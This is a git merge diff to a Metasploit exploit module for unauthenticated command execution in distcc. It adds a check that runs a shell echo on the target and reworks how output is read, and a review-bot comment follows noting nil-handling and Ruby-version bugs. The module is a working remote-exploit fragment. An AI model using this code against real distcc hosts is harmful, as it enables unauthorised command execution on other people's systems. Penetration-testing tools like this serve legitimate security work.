Merge branch 'distcc-add-check' of https://github.com/jlee-r7/metasploit-framework into jlee-r7-distcc-add-check
commit
af8cb03d1b
|
@ -63,6 +63,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
r = rand_text_alphanumeric(10)
|
||||
connect
|
||||
sock.put(dist_cmd("sh", "-c", "echo #{r}"))
|
||||
|
||||
dtag = rand_text_alphanumeric(10)
|
||||
sock.put("DOTI0000000A#{dtag}\n")
|
||||
|
||||
err, out = read_output
|
||||
if out.index(r)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
|
@ -72,6 +87,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
dtag = rand_text_alphanumeric(10)
|
||||
sock.put("DOTI0000000A#{dtag}\n")
|
||||
|
||||
err, out = read_output
|
||||
|
||||
(err || "").split("\n") do |line|
|
||||
print_status("stderr: #{line}")
|
||||
end
|
||||
(out || "").split("\n") do |line|
|
||||
print_status("stdout: #{line}")
|
||||
end
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
def read_output
|
||||
|
||||
res = sock.get_once(24, 5)
|
||||
|
||||
if !(res and res.length == 24)
|
||||
|
@ -85,12 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = sock.get_once(8, 5)
|
||||
len = [res].pack("H*").unpack("N")[0]
|
||||
|
||||
return if not len
|
||||
return [nil, nil] if not len
|
||||
if (len > 0)
|
||||
res = sock.get_once(len, 5)
|
||||
res.split("\n").each do |line|
|
||||
print_status("stderr: #{line}")
|
||||
end
|
||||
err = sock.get_once(len, 5)
|
||||
end
|
||||
|
||||
# Check STDOUT
|
||||
|
@ -98,16 +125,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = sock.get_once(8, 5)
|
||||
len = [res].pack("H*").unpack("N")[0]
|
||||
|
||||
return if not len
|
||||
return [err, nil] if not len
|
||||
if (len > 0)
|
||||
res = sock.get_once(len, 5)
|
||||
res.split("\n").each do |line|
|
||||
print_status("stdout: #{line}")
|
||||
end
|
||||
out = sock.get_once(len, 5)
|
||||
end
|
||||
return [err, out]
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
||||
|
|
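Review bot: In `check`, `out.index(r)` is called with no nil guard, although the reworked `read_output` returns `[nil, nil]` or `[err, nil]` when a length field cannot be parsed and leaves `out` as nil when the stdout length is 0. A host that answers unexpectedly therefore raises NoMethodError instead of producing a check code; `if out and out.index(r)` avoids that. Falling through to `Exploit::CheckCode::Safe` when nothing could be read reports a host as not vulnerable on what may only be a timeout, so `Exploit::CheckCode::Unknown` would be the more accurate result for that path, and `check` calls `connect` without a matching `disconnect`. In `exploit`, the block is handed directly to `split("\n")`, which Ruby versions before 2.6 silently ignore, so the stderr/stdout lines may never be printed; `(err || "").split("\n").each do |line|` restores the iteration the earlier code appears to have used. The page has lost its +/- markers, so which lines are new is inferred from the hunk counts.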